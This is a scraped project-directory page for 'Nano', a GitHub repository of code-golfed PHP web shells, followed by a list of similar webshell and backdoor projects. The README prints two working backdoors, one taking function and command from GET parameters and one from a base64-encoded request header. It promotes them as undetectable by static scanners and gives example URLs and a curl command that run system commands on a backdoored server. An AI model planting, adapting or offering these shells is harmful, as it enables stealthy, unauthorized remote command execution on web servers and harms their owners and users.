All Projects → s0md3v → Nano

s0md3v / Nano

Nano is a family of PHP web shells which are code golfed for stealth.

Labels

Projects that are alternatives of or similar to Nano

Rtty
Access your terminal from anywhere via the web.
Stars: ✭ 2,434 (+530.57%)
Mutual labels:  webshell
SecurityNotFound
🐚 404 Page Not Found Webshell
Stars: ✭ 81 (-79.02%)
Mutual labels:  webshell
kumasia
./kumasia php simple backdoor
Stars: ✭ 13 (-96.63%)
Mutual labels:  webshell
Jspmaster Deprecated
一款基于webshell命令执行功能实现的GUI webshell管理工具,支持流量加密
Stars: ✭ 161 (-58.29%)
Mutual labels:  webshell
Exphub
Exphub[漏洞利用脚本库] 包括Webloigc、Struts2、Tomcat、Nexus、Solr、Jboss、Drupal的漏洞利用脚本,最新添加CVE-2020-14882、CVE-2020-11444、CVE-2020-10204、CVE-2020-10199、CVE-2020-1938、CVE-2020-2551、CVE-2020-2555、CVE-2020-2883、CVE-2019-17558、CVE-2019-6340
Stars: ✭ 3,056 (+691.71%)
Mutual labels:  webshell
shu-shell
Webshell Jumping Edition
Stars: ✭ 23 (-94.04%)
Mutual labels:  webshell
Brutemap
Let's find someone's account
Stars: ✭ 113 (-70.73%)
Mutual labels:  webshell
Novahot
A webshell framework for penetration testers.
Stars: ✭ 284 (-26.42%)
Mutual labels:  webshell
Findwebshell
findWebshell是一款基于python开发的webshell检测工具。
Stars: ✭ 246 (-36.27%)
Mutual labels:  webshell
carina
Webshell, Virtual Private Server (VPS) and cPanel Database
Stars: ✭ 39 (-89.9%)
Mutual labels:  webshell
Php Backdoors
A collection of PHP backdoors. For educational or testing purposes only.
Stars: ✭ 2,034 (+426.94%)
Mutual labels:  webshell
Sks
Security Knowledge Structure(安全知识汇总)
Stars: ✭ 205 (-46.89%)
Mutual labels:  webshell
NginxExecute
The NginxExecute module executes the shell command through GET POST and HEAD to display the result.
Stars: ✭ 47 (-87.82%)
Mutual labels:  webshell
Wso Webshell
🕹 wso php webshell
Stars: ✭ 155 (-59.84%)
Mutual labels:  webshell
oneshellcrack
a very very fast brute force webshell password tool
Stars: ✭ 42 (-89.12%)
Mutual labels:  webshell
Phpshell
php大马|php一句话|webshell|免杀过狗|渗透|黑客
Stars: ✭ 118 (-69.43%)
Mutual labels:  webshell
slopShell
the only php webshell you need.
Stars: ✭ 208 (-46.11%)
Mutual labels:  webshell
Webshell Sniper
🔨 Manage your website via terminal
Stars: ✭ 359 (-6.99%)
Mutual labels:  webshell
kubefilebrowser
kubernetes container filebrowser and webshell
Stars: ✭ 23 (-94.04%)
Mutual labels:  webshell
webshells
php - asp - aspx
Stars: ✭ 19 (-95.08%)
Mutual labels:  webshell

nano

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient.
Put it on watch maybe, I will continue to upload more webshells in here.

Nano

<?=$_GET[p]==_&&$_GET[f]($GET_[c]);

Features

  • 35 bytes in size
  • Can't be detected by static code scanners
  • Supports authentication

Usage

http://example.com/nano.php?f=function&c=command&p=password

f is for function
c is for command
p is for password

For example, the code below will execute the ls command:

http://example.com/nano.php?f=system&c=ls&p=password

Ninja

<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);

Features

  • 93 bytes in size
  • Fully Undetectable

Usage

This one a bit complex.
Lets say you want to run system(ls) so write it as system~ls and then base64 encode it i.e. c3lzdGVtKGxzKQ==
Now add any 1 character at the start of it. Let say 'x' so it will be xc3lzdGVtKGxzKQ==
Now open your terminal and type the following command
curl -H 'x: xc3lzdGVtKGxzKQ==' http://example.com/backdoored.php
Too much work? You can use the handler instead.

handler

Everything Else

This is my first php thingy so if there's way to do what I did in a better way please let me know or open a pull request.
The nano project is licensed under MIT license which basically means you have to give me credit if you want to redistribute or modify it.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].